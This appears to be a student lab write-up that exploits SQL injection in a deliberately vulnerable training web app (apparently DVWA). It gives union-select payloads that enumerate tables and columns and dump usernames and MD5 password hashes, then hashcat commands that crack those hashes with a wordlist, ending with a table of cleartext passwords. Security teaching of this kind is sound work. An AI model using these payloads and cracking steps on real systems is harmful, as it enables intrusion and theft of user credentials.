When we change the ID parameter of the URL, it does the same thing as when we use the input field, the submission is done and we have the result
When we put the following command in the field :
%' or 0=0 union select null, version() #
The query is executed and the following result is obtained:
We conclude that the database version is 10.1.26 of MariaDB
To be able to select the important information of the users, we follow the following steps:
- Look at the names of the tables to identify the users
To see the tables, we used the following command
%' or 0=0 union select table_name, null from information_schema.tables #"
the following result is obtained:
So the name of the users table is users. There are other tables of course but we just stopped the capture at this level for readability reasons
- Identify important columns
We used the following command to find the columns of the users table.
%' or 0=0 union select column_name, null from information_schema.columns where table_name = 'users'
Here is the result
We see on this picture all the columns (highlighted in yellow) of the table.
- Select user data on the fields we are interested in
We have chosen to retrieve the following fields: user_id, user, first_name, last_name, last_login, password.
Here is the query used
%' or 0=0 union select 'user_id|user|first_name|last_name|last_login|password', concat(user_id,'|',user, '|', first_name, '|', last_name, '|', last_login, '|', password) from users #
And here is the result
The value of the First Name field displayed is just to help us find the value of the Surname field
To find the name of the database, we used this query:
%' or 0=0 union select null, database() #
This gives as an answer:
The query to do this is as follows:
%' or 0=0 union select table_name, null from information_schema.tables #
We also used it in answer 1.
Below is the result
We have already done so in answer 2.2.2 and here is the query we used
%' or 0=0 union select column_name, null from information_schema.columns where table_name = 'users' #
2.2.5. Now that we have the column names, print out the usernames and hashed passwords for each user !
We used this query to get the usernames and passwords of the users
%' or 0=0 union select 'user|password', concat(user, '|', password) from users #
Result:
the logic of the output is the same as the answer 2.2.2
To crack the passwords, we followed the following steps
We used the following echo command to create the file
echo -e "5f4dcc3b5aa765d61d8327deb882cf99\ne99a18c428cb38d5f260853678922e03\n8d3533d75ae2c3966d7e0d4fcc69216b\n0d107d09f5bbe40cade3de5c71e9e9b7\n5f4dcc3b5aa765d61d8327deb882cf99" >> target_hashes.txt
Here is what it looks like when displayed
The decompression was performed with the following command
gunzip /usr/share/wordlists/rockyou.txt.gz
The result
Here is the command used
hashcat -m 0 -a 0 -o cracked.txt target_hashes.txt /usr/share/wordlists/rockyou.txt
Here is what you get after cracking
We notice that we had 5 hashes and we have 4 results, this is explained by the fact that there are two identical hashes, so the same password.
Here is the final result with the users and their passwords in clear
| Id | Username | First Name | Last Name | Real Password | Hased password |
|---|---|---|---|---|---|
| 1 | admin | admin | admin | password | 5f4dcc3b5aa765d61d8327deb882cf99 |
| 2 | gordonb | Gordon | Brown | abc123 | e99a18c428cb38d5f260853678922e03 |
| 3 | 1337 | Hack | Me | charley | 8d3533d75ae2c3966d7e0d4fcc69216b |
| 4 | pablo | Pablo | Picasso | letmein | 0d107d09f5bbe40cade3de5c71e9e9b7 |
| 5 | smithy | Bob | Smith | password | 5f4dcc3b5aa765d61d8327deb882cf99 |